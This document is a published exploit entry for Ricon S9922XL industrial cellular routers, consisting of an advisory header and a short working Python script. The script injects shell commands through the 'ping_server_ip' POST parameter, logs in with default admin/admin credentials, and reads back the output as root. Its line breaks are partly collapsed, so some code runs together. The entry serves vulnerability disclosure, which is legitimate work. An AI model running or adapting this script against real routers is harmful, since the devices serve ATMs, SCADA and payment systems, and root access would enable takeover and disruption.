# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) # Date: 02.07.2021# Exploit Author: LiquidWorm# Vendor Homepage: https://www.riconmobile.com#!/usr/bin/env python3# -*- coding: utf-8 -*-### Ricon Industrial Cellular Router S9922XL Remote Command Execution### Vendor: Ricon Mobile Inc.# Product web page: https://www.riconmobile.com# Affected version: Model: S9922XL and S9922L# Firmware: 16.10.3## Summary: S9922L series LTE router is designed and manufactured by# Ricon Mobile Inc., it based on 3G/LTE cellular network technology# with industrial class quality. With its embedded cellular module,# it widely used in multiple case like ATM connection, remote office# security connection, data collection, etc.## The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi# and VPN technologies. Powerful 64-bit Processor and integrated real-time# operating system specially developed by Ricon Mobile. S9922XL is# widely used in many areas such as intelligent transportation, scada,# POS, industrial automation, telemetry, finance, environmental protection.## Desc: The router suffers from an authenticated OS command injection# vulnerability. This can be exploited to inject and execute arbitrary# shell commands as the admin (root) user via the 'ping_server_ip' POST# parameter. Also vulnerable to Heartbleed.## --------------------------------------------------------------------# C:\>python ricon.py 192.168.1.71 id# uid=0(admin) gid=0(admin)# --------------------------------------------------------------------## Tested on: GNU/Linux 2.6.36 (mips)#WEB-ROUTER### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2021-5653# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php### 02.07.2021#import requests,sys,re
iflen(sys.argv)<3:print("Ricon Industrial Routers RCE")print("Usage: ./ricon.py [ip] [cmd]")
sys.exit(17)else:
ipaddr=sys.argv[1]
execmd=sys.argv[2]
data={'submit_class':'admin','submit_button':'netTest','submit_type':'','action':'Apply','change_action':'','is_ping':'0','ping_server_ip':';'+execmd}
htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')print(reout)
